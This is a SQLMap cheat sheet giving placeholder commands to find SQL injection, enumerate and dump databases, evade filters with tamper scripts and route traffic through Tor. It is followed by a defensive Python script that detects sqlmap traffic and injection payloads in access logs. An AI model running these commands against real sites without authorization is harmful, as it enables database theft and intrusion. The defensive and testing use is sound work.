SQLMap Cheat Sheet

SQLMap is a powerful open-source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities. Below is a SQLMap cheat sheet to help you get started:

Basic Commands

Scan a Website for SQL Injection:

sqlmap -u "http://example.com/page?id=1"

Test Parameters Sent as POST Data:

sqlmap -u "http://example.com/page" --data="param1=value1&param2=value2"

Load Target URLs from a File:

sqlmap -m targets.txt

Enumeration and Information Gathering

Enumerate Databases:

sqlmap -u "http://example.com/page?id=1" --dbs

Enumerate Tables in a Database:

sqlmap -u "http://example.com/page?id=1" -D dbname --tables

Enumerate Columns in a Table:

sqlmap -u "http://example.com/page?id=1" -D dbname -T tablename --columns

Dump Data from a Table:

sqlmap -u "http://example.com/page?id=1" -D dbname -T tablename --dump

Advanced Exploitation

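Set a Custom Prefix and Suffix for Injection Payloads:

sqlmap -u "http://example.com/page" --data="param1=value1" --prefix="'" --suffix="-- -"

sqlmap generates the payloads itself; --prefix and --suffix set the strings placed around each one.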

Limit Testing to One Parameter, DBMS and Technique (U = UNION query):

sqlmap -u "http://example.com/page" --data="param1=value1" -p param1 --dbms=mysql --technique=U

Authentication

Test a Login Form with a Session Cookie:

sqlmap -u "http://example.com/login" --data="username=test&password=test" --cookie="PHPSESSID=abc123"

Run Without Prompts, with Threads and Tamper Scripts:

sqlmap -u "http://example.com/login" --data="username=test&password=test" --dbms=mysql --batch --threads=5 --tamper=between,randomcase

Output Options

Save Results to a Custom Output Directory:

sqlmap -u "http://example.com/page" --data="param1=value1" --output-dir=./sqlmap-output

Choose the Format of Dumped Table Data (CSV, HTML or SQLITE):

sqlmap -u "http://example.com/page" --data="param1=value1" -D dbname -T tablename --dump --dump-format=CSV

General Options

Specify Proxy for Requests:

sqlmap -u "http://example.com/page" --data="param1=value1" --proxy=http://127.0.0.1:8080

Set Delay Between Requests:

sqlmap -u "http://example.com/page" --data="param1=value1" --delay=5

Enable Tor Anonymity Network:

sqlmap -u "http://example.com/page" --data="param1=value1" --tor

This cheat sheet provides a quick reference for some common SQLMap commands. Always ensure that you have proper authorization to conduct penetration testing and ethical hacking activities. Refer to the official SQLMap documentation for more detailed information and advanced options.
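
For the defending side, an added example (not part of the original cheat sheet or of sqlmap itself): a small Python scan of web access logs for the traces that scans like the ones above leave behind. It assumes the Apache/nginx combined log format and that an unmodified sqlmap sends a User-Agent starting with `sqlmap/`; the log lines, IP addresses and rule names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines in combined log format (not from a real server).
SAMPLE_LOG = '''\
203.0.113.7 - - [10/Jan/2024:10:00:01 +0000] "GET /page?id=1 HTTP/1.1" 200 512 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
203.0.113.7 - - [10/Jan/2024:10:00:02 +0000] "GET /page?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20- HTTP/1.1" 200 498 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2024:10:00:03 +0000] "GET /page?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Jan/2024:10:00:04 +0000] "GET /page?id=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Jan/2024:10:00:05 +0000] "GET /news?title=student+union+selects+chair HTTP/1.1" 200 900 "-" "Mozilla/5.0"
'''

# One combined-log entry: client IP, request target and User-Agent are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# Assumption: an unmodified sqlmap identifies itself as "sqlmap/<version>...".
UA_RE = re.compile(r"^sqlmap/", re.I)

# Hypothetical rule names; each pattern runs on the URL-decoded query string.
QUERY_RULES = {
    # Word boundaries keep ordinary text such as "union selects" from matching.
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    # A quote-delimited comparison following OR, e.g. ' OR '1'='1
    "quoted-tautology": re.compile(r"'\s*or\s*'[^']*'\s*=\s*'", re.I),
}

def findings(log_text):
    """Return (client_ip, path, [rule names]) for every suspicious log line."""
    results = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        path, _, raw_query = m["target"].partition("?")
        query = unquote_plus(raw_query)  # decode %xx and '+' before matching
        reasons = []
        if UA_RE.match(m["ua"]):
            reasons.append("sqlmap-user-agent")
        reasons += [name for name, rx in QUERY_RULES.items() if rx.search(query)]
        if reasons:
            results.append((m["ip"], path, reasons))
    return results

if __name__ == "__main__":
    for ip, path, reasons in findings(SAMPLE_LOG):
        print(ip, path, ", ".join(reasons))
```

The User-Agent rule only catches a default configuration, because the header is client-controlled, and the query-string rules do not see parameters sent in a POST body with --data, which access logs normally omit.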